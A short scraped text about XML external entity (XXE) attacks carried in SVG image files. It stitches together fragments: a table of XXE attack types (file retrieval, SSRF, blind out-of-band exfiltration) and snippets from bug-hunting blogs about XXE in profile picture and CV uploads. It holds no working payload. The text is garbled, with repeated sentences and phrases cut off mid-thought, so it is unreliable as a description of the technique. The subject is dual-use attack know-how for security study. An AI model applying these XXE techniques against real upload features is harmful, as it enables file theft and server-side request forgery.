Svg Xxe. XXE can also be found in XML based file formats such as SVG files. XXE during SVG image conversion.
XXE Attack TypeDescriptionExploiting XXE to Retrieve FilesWhere an external entity is defined containing the contents of a file and returned in the applications responseExploiting XXE to Perform SSRF AttacksWhere an external entity is defined based on a URL to a back-end systemExploiting Blind XXE Exfiltrate Data Out-of-BandWhere sensitive data. XXE can also be found in XML based file formats such as SVG files. In this example we will take a look at how we can leak data from a file using a SVG.
One such format is the Scalable Vector Graphics SVG image format.
I found this vulnerability in the profile picture upload as well as in the CV upload functionality of an application. XXE in SVG Parsing 10. Apr 22 Hello everyone in this blog I will describe how I was able to find XXE that leads to SSRF via a file upload. XXE in rapid web application development framework allows reading arbitrary files.